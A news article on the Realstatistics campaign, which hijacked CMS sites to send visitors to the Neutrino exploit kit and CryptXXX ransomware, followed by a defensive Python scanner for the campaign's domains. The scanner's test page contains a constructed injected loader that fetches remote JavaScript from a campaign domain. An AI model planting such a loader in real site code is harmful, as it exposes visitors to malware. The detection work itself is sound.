Crooks are compromising CMS-based websites, mainly WordPress and Joomla installs, to hijack Web traffic and redirect visitors to rogue sites hosting the Neutrino exploit kit, which infects victims with the CryptXXX ransomware.
According to Web security firm Sucuri, this latest campaign, dubbed Realstatistics, has been raging on for the past two weeks, with at least 100 new infected websites detected every day, based on the company’s telemetry data.
Over 2,000 sites already infected
All in all, the company says it has detected at least 2,000 sites affected by the campaign. Since the data comes only from sites scanned with the Sucuri site checker, the real number is likely higher; Sucuri founder and CTO Daniel Cid says it could be five times bigger.
Looking at all the infected systems, Cid says that around 90 percent of the sites are running some sort of CMS platform, and that WordPress and Joomla together account for 60 percent of that total.
Judging by the CMS version numbers, the crooks do not appear to be exploiting a core vulnerability: fully patched installs are among the compromised sites, which points to vulnerable plugins as the most likely way the Realstatistics authors are getting in.
Crooks load malicious JS code from the realstatistics[.]pro domain
The name Realstatistics comes from the realstatistics[.]info and realstatistics[.]pro domains used in the campaign. After hijacking a site, the crooks inject a malicious JS script that is loaded from one of these two domains. Only the .pro domain is currently active; it has been showing up on hijacked sites since July 1.
The rogue script diverts incoming traffic, redirecting visitors to another URL hosting the Neutrino exploit kit. There, the exploit kit uses Flash Player or PDF Reader vulnerabilities to push the CryptXXX ransomware onto PCs running out-of-date, vulnerable versions of that software.
Google has started detecting the malicious source code added to these sites and has begun flagging infected domains.
Site owners who want to check their sites can run them through the Sucuri site checker mentioned above, or look through their pages' source code for script tags loading from the realstatistics[.]info or realstatistics[.]pro domains.
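The manual check above can be automated. The script below is an added example, not Sucuri's tool or anything from the campaign: it parses a saved copy of a page and reports every script tag whose src points at one of the two Realstatistics domains, plus any inline script that mentions them (a loader that builds the URL in JavaScript still has to contain the domain as a string). The sample page is constructed to illustrate the injection pattern the article describes; the exact markup the campaign injects is not reproduced here.

```python
"""Scan HTML for <script> tags that load from the Realstatistics IOC domains.

Added example; not Sucuri's or the campaign's code. SAMPLE_PAGE is a
constructed page that mimics the injection pattern described in the article.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Indicator domains named in the article (written undefanged so they match).
IOC_DOMAINS = {"realstatistics.info", "realstatistics.pro"}


def _host_of(src: str) -> str:
    """Lowercase hostname of a script src; protocol-relative '//host/x.js' is handled too."""
    src = src.strip()
    if src.startswith("//"):
        src = "http:" + src
    return (urlsplit(src).hostname or "").lower()


def _matches_ioc(host: str) -> bool:
    """True for the IOC domain itself or any subdomain of it."""
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


class _ScriptScanner(HTMLParser):
    """Collects (kind, indicator, line) for external and inline script hits."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_line = 0
        self._inline = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        self._script_line = self.getpos()[0]
        self._inline = []
        src = dict(attrs).get("src")
        if src and _matches_ioc(_host_of(src)):
            self.findings.append(("external", src, self._script_line))

    def handle_data(self, data):
        if self._in_script:           # script bodies arrive here in CDATA mode
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag != "script":
            return
        body = "".join(self._inline).lower()
        for d in sorted(IOC_DOMAINS):
            if d in body:
                self.findings.append(("inline", d, self._script_line))
        self._in_script = False


def scan_html(html: str):
    """Return a list of (kind, indicator, line_number) tuples, one per IOC hit."""
    p = _ScriptScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a legitimate jQuery include, an injected external loader on a
# protocol-relative URL, and an injected inline loader that assembles the URL in JS.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script type="text/javascript" src="//realstatistics.pro/stats.js"></script>
</head><body>
<script>var s=document.createElement("script");s.src="http://cdn.realstatistics.info/v.js";document.head.appendChild(s);</script>
</body></html>"""

if __name__ == "__main__":
    for kind, indicator, line in scan_html(SAMPLE_PAGE):
        print(f"line {line}: {kind} script referencing {indicator}")
```

Run it against the HTML the server actually returns (for example, the output of `curl -L` against the site), because the injection may live in a theme or plugin file that is only rendered at request time. A scanner like this only catches the two domains named in the article; once a site is confirmed compromised, grep the whole webroot for the same strings and look for recently modified PHP files rather than relying on the page check alone.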